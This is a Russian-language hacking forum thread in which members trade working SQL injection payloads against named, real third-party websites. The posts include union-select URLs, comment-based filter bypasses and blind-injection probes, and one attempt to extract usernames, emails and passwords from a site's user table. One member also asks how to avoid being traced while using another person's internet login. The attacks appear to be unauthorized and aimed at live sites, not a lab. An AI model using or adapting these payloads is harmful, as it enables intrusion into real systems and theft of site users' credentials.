Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    http://www.theglobalreport.org/print.php?news_id=-100'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+--+
     
    1 person likes this.
  2. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    Ок спасибо

    http://www.skai.gr/master_story.php?id=113998%27

    Тут возможна иньекция?
    Когда подставляю id=-1+union+select+1,2--
    То пишет не найдено
     
  3. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    ветка 4
    http://www.skai.gr/master_story.php?id=113998+and+substring(version(),1,1)=4

    Фильтрация union, select

    http://www.skai.gr/master_story.php?id=113998+and+substring(version(),1,1)=4/*select*/

    PS. diznt давай уже что-то читать начни, а не только писать, всё это в статьях изложено и трудностей вызывать не должно, ты ведь не первый день на форуме
     
  4. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    Вот еще такой вопрос (правда не по уязвимостям)
    Если я к примеру сижу через чужой логин в инете
    то как меня вычеслят? ну я имею ввиду что корбина узнает что мол кто то сидит с акка и как они меня будут искать? я понимаю что там у них мой адрес где я проживаю
    но все таки интересует как они узнают что с этого адреса где я прожимаю сидели под чужим логином?
     
  5. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    diznt, с корбиной не знаком, но разве у тебя нет локального адреса, под которым ты заходишь в инет?
     
  6. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    mailbrush мне нужно подключаться самому
     
  7. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Эм.. Но ведь локалка есть? Если да - тебя вычислят по твоему внутреннему айпи.
     
  8. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://tksavelovskiy.ru/actions.html?s=3&a=34073'&page=1

    Jokester твои мысли?
     
  9. PaCo

    PaCo Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    436
    Likes Received:
    138
    Reputations:
    25
    я хоть и не великий и могучий Jokester но выскажу свое пмсм - не факт что там sql injection или вообше есть какая то уязвимость,никакие логические конструкции не проходят, значит по всей видимости в $_GET['a'] заноситься значения только если $_GET['a'] int (например $_GET['a']=is_numeric($_GET['a']) ? $_GET['a'] :1; ну или что типа такого) , а то что неустановлены индексы у массивов так вполне возможно что mysql_fetch_assoc и потом в скрипте идет обрашения к индексам без проверки их существования. Короче похоже на какую то логическую ошибку в скрипте.
     
    #5869 PaCo, 13 Mar 2009
    Last edited: 13 Mar 2009
    1 person likes this.
  10. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4
    Если на сайте есть SQL-inj но не выводится ошибка...то как-то можно обойти?


    А точнее если вызываю нарушение запроса таким способом 1' то выходит ошибка (похоже SQL класс подключен) ошибка ссылается на WHERE id='1''

    PHP:
    1064 You have an error in your SQL syntaxcheck the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1 )
    А если прописываю так 1'+or+'2 то запрос нормально выполняется...
    Как можно попробовать провести инъекцию?
     
    #5870 Byrger, 13 Mar 2009
    Last edited: 13 Mar 2009
  11. AkyHa_MaTaTa

    AkyHa_MaTaTa Elder - Старейшина

    Joined:
    19 Mar 2007
    Messages:
    557
    Likes Received:
    306
    Reputations:
    27
    ну наверно стоит закрывать остальной запрос коментами, самым простым способом 1'+order+by+1--+(/*,%23), а вообще линк в студию, ну а вообще я не вижу в чем проблема, наверно все таки стоит начать читать статьи.
     
  12. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4
    Проблема то в том что ошибка не выводится....
    А запрос проходит отлично.
     
    #5872 Byrger, 13 Mar 2009
    Last edited: 13 Mar 2009
  13. PaCo

    PaCo Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    436
    Likes Received:
    138
    Reputations:
    25
    теперь от меня глупый вопрос, что здесь можно придумать
    http://ozpp.ru/sovet/lesnyak'/

    уж как я не извививался ничего не выходит
     
  14. geezer.code

    geezer.code Elder - Старейшина

    Joined:
    22 Jan 2007
    Messages:
    552
    Likes Received:
    358
    Reputations:
    90
    если комментарии поставить не удается. в чем я все таки сомневаюсь. можно работать как со слепой инъекцией
    1'+and+substring(version(),1,1)=3+or+'2
    Итд
    хотя конечно бред ((

    конструкция id='1' or '2' - нежизнеспособна.
     
    #5874 geezer.code, 13 Mar 2009
    Last edited: 13 Mar 2009
  15. geezer.code

    geezer.code Elder - Старейшина

    Joined:
    22 Jan 2007
    Messages:
    552
    Likes Received:
    358
    Reputations:
    90
    тут ничего нет.

    зы постом ниже лайт показал инъект, НО в ФФ3 я его не вижу (х_х)
    в остальных браузерах ошибки итд. а в фф просто "страница не найдена."

    поговорить об этом можно тут https://forum.antichat.ru/thread111019.html
     
    #5875 geezer.code, 13 Mar 2009
    Last edited: 14 Mar 2009
    1 person likes this.
  16. l1ght

    l1ght Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    191
    Likes Received:
    678
    Reputations:
    333
    вобщем, http://ozpp.ru/sovet/lesnyak'/**/union/**/select/**/1,2,3,4,5,6,7,user(),9,10,11,12/*
     
    #5876 l1ght, 13 Mar 2009
    Last edited: 13 Mar 2009
    5 people like this.
  17. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    У меня в городе есть хороший кинотеат - кронверксинема и я давно на их сайте нашел скулю) Но все никак не могу раскрутить до конца...
    Решил тут вот запостить.
    http://kronverkcinema.ru/repertoire/movies/watchmen'/**/union/**/select/**/1,2,3,4,5,6,7/* - это то до чего я добрался. Ошибка осталась, но при другом кол-ве полей еще одна ошибка вылезает => запрос правильный. Но выводимых полей нету... Чего я только не пробывал)
     
  18. EmIL

    EmIL New Member

    Joined:
    13 Mar 2009
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    http://www.rfbd.ru/

    В общем из information_schema.tables вытягиваю нахожу таблицу jos_users. Далее делаю запрос WHERE+TABLE_NAME=0x6a6f735f7573657273

    вот код:
    http://www.rfbd.ru/info.php?id=-446+union+select+1,2,3,4,5,6,7,8,column_name,10,11,12,13,14,15,16,17,18,19,20+from+information_schema.colu mns+where+table_name=0x6a6f735f7573657273+limit+4,1&region=72&rubrika=10
    Оттуда с помощью LIMIT нахожу username, email, password.

    Далее:
    http://www.rfbd.ru/info.php?id=-446+union+select+1,2,3,4,5,6,7,8,username,10,11,12,13,14,15,16,17,18,19,20+from+jos_users+limit+1,1&region=72&rubrika=10
    И появляется ошибка. Что не так сделал?
     
  19. hookman

    hookman Member

    Joined:
    16 Feb 2009
    Messages:
    44
    Likes Received:
    10
    Reputations:
    0
    Таблица находиться в другой БД
     
  20. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    Проверил... Там только две ДБ: a1rfbd_ric_datebase и test... Ни в одной jos_users не подходит. А вообще разве это Joomla? Да и папка /administration/ нету. Ищи другие таблицы...
     
Thread Status:
Not open for further replies.